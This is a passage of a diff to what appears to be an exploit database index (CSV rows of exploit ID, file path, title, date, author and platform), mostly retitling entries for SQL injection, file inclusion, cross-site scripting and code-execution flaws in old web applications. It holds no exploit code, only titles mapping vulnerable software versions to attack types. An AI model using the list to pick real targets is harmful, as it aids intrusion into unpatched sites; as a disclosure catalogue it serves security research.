8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0
8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0
8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0
8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0
8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection",2009-04-08,H!tm@N,php,webapps,0
8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0
8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0
8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0
@ -20958,7 +20962,7 @@ id,file,description,date,author,platform,type,port
8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0
8715,platforms/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0
8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0
8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0
@ -21150,7 +21154,7 @@ id,file,description,date,author,platform,type,port
8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0
8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0
8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0
8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0
8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0
8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0
8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0
8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0
@ -21160,7 +21164,7 @@ id,file,description,date,author,platform,type,port
8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0
8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0
8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0
8997,platforms/php/webapps/8997.txt,"Kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0
8997,platforms/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps,0
8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0
8999,platforms/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0
9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0
@ -21424,7 +21428,7 @@ id,file,description,date,author,platform,type,port
9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
@ -22423,7 +22427,7 @@ id,file,description,date,author,platform,type,port
11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0
11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0
11507,platforms/php/webapps/11507.txt,"WSC CMS - (Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0
11508,platforms/php/webapps/11508.txt,"Trixbox 2.2.4 - PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0
11508,platforms/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps,0
11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0
11511,platforms/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0
11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,php,webapps,0
@ -22663,7 +22667,7 @@ id,file,description,date,author,platform,type,port
11894,platforms/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite - (Module Jokes) SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0
11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
@ -23484,7 +23488,7 @@ id,file,description,date,author,platform,type,port
14026,platforms/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0
14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
14030,platforms/asp/webapps/14030.pl,"PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0
14030,platforms/asp/webapps/14030.pl,"PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0
14033,platforms/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",php,webapps,0
14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
@ -24483,7 +24487,7 @@ id,file,description,date,author,platform,type,port
16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,php,webapps,0
16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit)",2011-01-14,Metasploit,php,webapps,0
16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
16904,platforms/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
@ -24505,7 +24509,7 @@ id,file,description,date,author,platform,type,port
16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0
16947,platforms/php/webapps/16947.txt,"WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0
16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
16949,platforms/php/webapps/16949.php,"Maian Weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0
16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0
16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0
@ -24711,7 +24715,7 @@ id,file,description,date,author,platform,type,port
17423,platforms/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0
17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0
17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0
17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
17435,platforms/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0
17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0
17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0
@ -29015,8 +29019,8 @@ id,file,description,date,author,platform,type,port
27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - users_profiles.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - users_mgallery.asp usid Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0
27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0
27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
@ -30755,9 +30759,9 @@ id,file,description,date,author,platform,type,port
29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0
29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0
29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0
29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - iklan.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - bukutamu.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps,0
29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0
29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0
@ -31303,7 +31307,7 @@ id,file,description,date,author,platform,type,port
30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0
30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - chat/users_popupL.php3 Multiple Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla! Component com_content 1.5 RC3 - 'index.php' view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0
30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0
@ -31418,8 +31422,8 @@ id,file,description,date,author,platform,type,port
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0
@ -32158,7 +32162,7 @@ id,file,description,date,author,platform,type,port
32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80
32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php Filename Parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80
32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0
32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0
32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery - images.php Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0
@ -32210,7 +32214,7 @@ id,file,description,date,author,platform,type,port
32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0
32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0
32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0
32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0
32239,platforms/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0
32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0
32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0
32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0
@ -32223,7 +32227,7 @@ id,file,description,date,author,platform,type,port
32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0
32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0
32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Parameter Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -32913,7 +32917,6 @@ id,file,description,date,author,platform,type,port
33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0
33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0
33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@ -33657,7 +33660,7 @@ id,file,description,date,author,platform,type,port
34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0
34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0
34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
34793,platforms/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps,0
@ -34461,7 +34464,7 @@ id,file,description,date,author,platform,type,port
36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0
36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
36129,platforms/php/webapps/36129.txt,"Pluck 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36129,platforms/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0
36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0
@ -34525,7 +34528,7 @@ id,file,description,date,author,platform,type,port
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
@ -34581,7 +34584,7 @@ id,file,description,date,author,platform,type,port
36298,platforms/php/webapps/36298.txt,"Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
36302,platforms/php/webapps/36302.txt,"Joomla! Component 'com_content' - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
